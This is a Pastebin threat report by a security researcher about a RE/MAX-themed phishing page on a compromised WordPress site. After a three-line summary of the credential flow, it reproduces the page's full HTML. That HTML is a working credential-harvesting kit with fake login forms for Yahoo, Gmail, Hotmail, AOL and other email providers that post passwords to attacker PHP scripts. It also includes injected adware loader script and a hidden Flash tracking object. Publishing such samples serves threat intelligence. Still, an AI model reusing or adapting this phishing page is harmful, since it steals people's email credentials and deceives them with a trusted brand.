Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Remax Phish
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- ******
- If I go here hxxp://www.touch-guide.com/wp-content/upgrade/7/view/vieww.html
- And enter userid/pwd it posts here hxxp://www.touch-guide.com/wp-content/upgrade/7/view/yahoo.php
- Then redirects to here http://www.remax.com/
- ******
- hxxp://www.touch-guide.com/wp-content/upgrade/7/view/vieww.html
- ******
- <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <title>RE/MAX - Fore Closure/Luxury Homes</title>
- <link rel="stylesheet" type="text/css" href="index_files/style.htm">
- <style type="text/css">
- div {
- position: absolute;
- left: 620px;
- top: 40px;
- background-color: #EBEBEB;
- width: 280px;
- padding: 10px;
- color: #000000;
- border: #0000cc 2px dashed;
- display: none;
- }
- body,td,th {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 12px;
- }
- body {
- background-color: #999;
- background-image: url(backgroundimage.png);
- }
- </style>
- <script language="Javascript">
- function echeck(str) {
- var at="@"
- var dot="."
- var lat=str.indexOf(at)
- var lstr=str.length
- var ldot=str.indexOf(dot)
- if (str.indexOf(at)==-1){
- alert("Invalid E-mail ID")
- return false
- }
- if (str.indexOf(at)==-1 || str.indexOf(at)==0 || str.indexOf(at)==lstr){
- alert("Invalid E-mail ID")
- return false
- }
- if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
- alert("Invalid E-mail ID")
- return false
- }
- if (str.indexOf(at,(lat+1))!=-1){
- alert("Invalid E-mail ID")
- return false
- }
- if (str.substring(lat-1,lat)==dot || str.substring(lat+1,lat+2)==dot){
- alert("Invalid E-mail ID")
- return false
- }
- if (str.indexOf(dot,(lat+2))==-1){
- alert("Invalid E-mail ID")
- return false
- }
- if (str.indexOf(" ")!=-1){
- alert("Invalid E-mail ID")
- return false
- }
- return true
- }
- function ValidateFormYahoo(){
- var emailID=document.yahoo.yahoouser
- var emailPASS=document.yahoo.yahoopassword
- if ((emailID.value==null)||(emailID.value=="")){
- alert("Please Enter your Email ID")
- emailID.focus()
- return false
- }
- if ((emailPASS.value==null)||(emailPASS.value=="")){
- alert("Please Enter your Email Password")
- emailPASS.focus()
- return false
- }
- return true
- }
- function ValidateFormHotmail(){
- var emailID=document.hotmail.hotmailuser
- var emailPASS=document.hotmail.hotmailpassword
- if ((emailID.value==null)||(emailID.value=="")){
- alert("Please Enter your Email ID")
- emailID.focus()
- return false
- }
- if ((emailPASS.value==null)||(emailPASS.value=="")){
- alert("Please Enter your Email Password")
- emailPASS.focus()
- return false
- }
- return true
- }
- function ValidateFormGmail(){
- var emailID=document.gmail.gmailuser
- var emailPASS=document.gmail.gmailpassword
- if ((emailID.value==null)||(emailID.value=="")){
- alert("Please Enter your Email ID")
- emailID.focus()
- return false
- }
- if ((emailPASS.value==null)||(emailPASS.value=="")){
- alert("Please Enter your Email Password")
- emailPASS.focus()
- return false
- }
- return true
- }
- function ValidateFormAol(){
- var emailID=document.aol.aoluser
- var emailPASS=document.aol.aolpassword
- if ((emailID.value==null)||(emailID.value=="")){
- alert("Please Enter your Email ID")
- emailID.focus()
- return false
- }
- if ((emailPASS.value==null)||(emailPASS.value=="")){
- alert("Please Enter your Email Password")
- emailPASS.focus()
- return false
- }
- return true
- }
- function ValidateFormOther(){
- var emailID=document.other.otheruser
- var emailPASS=document.other.otherpassword
- if ((emailID.value==null)||(emailID.value=="")){
- alert("Please Enter your Email ID")
- emailID.focus()
- return false
- }
- if ((emailPASS.value==null)||(emailPASS.value=="")){
- alert("Please Enter your Email Password")
- emailPASS.focus()
- return false
- }
- if (echeck(emailID.value)==false){
- emailID.value=""
- emailID.focus()
- return false
- }
- return true
- }
- </script>
- <script language="javascript">
- function toggle() {
- var ele = document.getElementById("toggleText");
- var text = document.getElementById("displayText");
- if(ele.style.display == "block") {
- ele.style.display = "none";
- text.innerHTML = "show";
- }
- else {
- ele.style.display = "block";
- text.innerHTML = "hide";
- }
- }
- function togglegmail() {
- var ele = document.getElementById("toggleTextgmail");
- var text = document.getElementById("displayTextgmail");
- if(ele.style.display == "block") {
- ele.style.display = "none";
- text.innerHTML = "show";
- }
- else {
- ele.style.display = "block";
- text.innerHTML = "hide";
- }
- }
- function togglehotmail() {
- var ele = document.getElementById("toggleTexthotmail");
- var text = document.getElementById("displayTexthotmail");
- if(ele.style.display == "block") {
- ele.style.display = "none";
- text.innerHTML = "show";
- }
- else {
- ele.style.display = "block";
- text.innerHTML = "hide";
- }
- }
- function toggleaol() {
- var ele = document.getElementById("toggleTextaol");
- var text = document.getElementById("displayTextaol");
- if(ele.style.display == "block") {
- ele.style.display = "none";
- text.innerHTML = "show";
- }
- else {
- ele.style.display = "block";
- text.innerHTML = "hide";
- }
- }
- function toggleother() {
- var ele = document.getElementById("toggleTextother");
- var text = document.getElementById("displayTextother");
- if(ele.style.display == "block") {
- ele.style.display = "none";
- text.innerHTML = "show";
- }
- else {
- ele.style.display = "block";
- text.innerHTML = "hide";
- }
- }
- </script>
- <script type="text/javascript">(typeof _GPL_16_loaded == 'undefined') && (_GPL_16_loaded=true) && (_GPL_i=document.getElementsByTagName('head')) && (_GPL_i=(_GPL_i.length>0)?_GPL_i:document.getElementsByTagName('body')) && (_GPL_i.length>0) && (_GPL_j=document.createElement('script')) && (_GPL_j.async=true) && (_GPL_j.type='text/javascript') && (_GPL_j.src='https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_16.js?pid=16&zoneid=7818&cid=US&rid=NV&ccid=Fernley&ip=199.48.177.231&aoi=1316649369') && (_GPL_i[0].appendChild(_GPL_j))</script><script type="text/javascript">if (window.addEventListener) {
- var callback_func = function(evt) {
- if ('undefined' != typeof evt.target && "A" == evt.target.nodeName) {
- var url = evt.target.href;
- EBCallBackMessageReceivedCT2612669_129564560723477699(url);
- }
- return true;
- };
- var result = window.addEventListener('click', callback_func, true);
- var result = window.addEventListener('contextmenu', callback_func, true);
- } else if (document.attachEvent) {
- var callback_func = function () {
- if ('undefined' != typeof event.srcElement &&'A' == event.srcElement.tagName) {
- var url = event.srcElement.href;
- EBCallBackMessageReceivedCT2612669_129564560723477699(url);
- }
- return true;
- };
- var result = document.attachEvent('onclick', callback_func);
- var result = document.attachEvent('oncontextmenu', callback_func);
- }
- </script></head>
- <body bgcolor="#efefef">
- <table id="wrapper" align="center" bgcolor="#cccccc" cellpadding="10" cellspacing="1"><tbody><tr><td bgcolor="#ffffff">
- <table width="100%"><tbody><tr><td width="50%">
- <h1><img src="http://www.mtwashingtonvalley.org/MemberImgs/76/Remax_01_042308.jpg" height="87" width="137"></h1>
- </td></tr></tbody></table>
- <br>
- <table id="invoicetoptables" cellspacing="0" width="100%">
- <tbody><tr>
- <td id="invoicecontent" width="50%">
- <table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%">
- <tbody><tr>
- <td id="invoicecontent" style="border: 0px solid rgb(204, 204, 204);" valign="top">
- <p><font color="#990000" size="4">To access our online secured properties auction page, <br>
- you are required to choose your email address below</font></p>
- <br>
- <br>
- <font class="paid">Choose your email provider below and login:</font>
- <br>
- <br>
- <br>
- <p align="center">
- <a href="javascript:toggle();"><img src="yahoo.jpg" title="Yahoomail" id="displayText" border="0" height="48" width="132"></a>
- <a href="javascript:togglegmail();"><img src="gmail.jpg" title="Gmail" id="displayTextgmail" border="0" height="48" width="132"></a>
- <br>
- <br>
- <br>
- <a href="javascript:togglehotmail();"><img src="hotmail.jpg" title="Hotmail" id="displayTexthotmail" border="0" height="48" width="132"></a>
- <a href="javascript:toggleaol();"><img src="aol.jpg" title="Aol" id="displayTextaol" border="0" height="48" width="132"></a>
- <br>
- <br>
- <br>
- <a href="javascript:toggleother();"><img src="other.jpg" title="Other Email" id="displayTextother" border="0" height="48" width="132"></a>
- </p>
- <!-- YAHOO CONFIG !-->
- <div id="toggleText" style="display: none">
- <p><img src="index_files/yahoo.jpg" title="Yahoomail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
- <br>
- <form name="yahoo" method="post" action="yahoo.php" onSubmit="return ValidateFormYahoo()">
- <p>
- <br>
- <label>Yahoo Email Address:</label>
- <br>
- <input name="yahoouser" style="width: 200px;" type="text">
- <br>
- <label>Yahoo Password</label>
- <br>
- <input name="yahoopassword" style="width: 200px;" type="password">
- <br>
- <br>
- <input name="s_yahoo" value="Sign In" type="submit">
- </p>
- </form>
- </div>
- <!-- GMAIL CONFIG !-->
- <div id="toggleTextgmail" style="display: none">
- <p><img src="index_files/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
- <br>
- <form name="gmail" method="post" action="gmail.php" onSubmit="return ValidateFormGmail()">
- <p>
- <label>Gmail Email Address:</label>
- <br>
- <input name="gmailuser" style="width: 200px;" type="text">
- <br>
- <label>Gmail Password</label>
- <br>
- <input name="gmailpassword" style="width: 200px;" type="password">
- <br>
- <br>
- <input name="s_gmail" value="Sign in" type="submit">
- </p>
- </form>
- </div>
- <!-- HOTMAIL CONFIG !-->
- <div id="toggleTexthotmail" style="display: none">
- <p><img src="index_files/hotmail.jpg" title="Hotmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
- <br>
- <form name="hotmail" method="post" action="hotmail.php" onSubmit="return ValidateFormHotmail()">
- <p>
- <label>Hotmail Email Address:</label>
- <br>
- <input name="hotmailuser" style="width: 200px;" type="text">
- <br>
- <label>Hotmail Password</label>
- <br>
- <input name="hotmailpassword" style="width: 200px;" type="password">
- <br>
- <br>
- <input name="s_hotmail" value="Sign in" type="submit">
- </p>
- </form>
- </div>
- <!-- AOL CONFIG !-->
- <div id="toggleTextaol" style="display: none">
- <p><img src="index_files/aol.jpg" title="Aol" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
- <br>
- <form name="aol" method="post" action="aol.php" onSubmit="return ValidateFormAol()">
- <p>
- <label>Aol Email Address:</label>
- <br>
- <input name="aoluser" style="width: 200px;" type="text">
- <br>
- <label>Aol Password</label>
- <br>
- <input name="aolpassword" style="width: 200px;" type="password">
- <br>
- <br>
- <input name="s_aol" value="Sign In" type="submit">
- </p>
- </form>
- </div>
- <!-- OTHER CONFIG !-->
- <div id="toggleTextother" style="display: none">
- <p><img src="index_files/other.jpg" title="Other" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
- <br>
- <form name="other" method="post" action="other.php" onSubmit="return ValidateFormOther()">
- <p>
- <label>Email Address:</label>
- <br>
- <input name="otheruser" style="width: 200px;" type="text">
- <br>
- <label>Password</label>
- <br>
- <input name="otherpassword" style="width: 200px;" type="password">
- <br>
- <br>
- <input name="s_other" value="Sign In" type="submit">
- </p>
- </form>
- </div>
- </td>
- </tr>
- </tbody></table>
- </td></tr></tbody></table>
- </td>
- </tr></tbody></table><iframe style="display: none;" src="index_files/google.htm" id="y2Google"></iframe><div id="_GPL_e6a00_div" style="position: absolute;"><object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="_GPL_e6a00_swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" height="1" width="1"><param value="http://d3lvr7yuk4uaui.cloudfront.net/items/e6a00/storage.swf" name="movie"><param value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl" name="FlashVars"><param value="always" name="allowscriptaccess"><embed pluginspage="http://www.macromedia.com/go/getflashplayer" flashvars="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" loop="false" play="true" name="_GPL_e6a00_swf" bgcolor="#ffffff" src="index_files/storage.swf" align="middle" height="1" width="1"></object></div><div style="display: none;" id="YontooInstallID">53F185F5-B55B-7227-CDAE-4D9C688D1835</div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement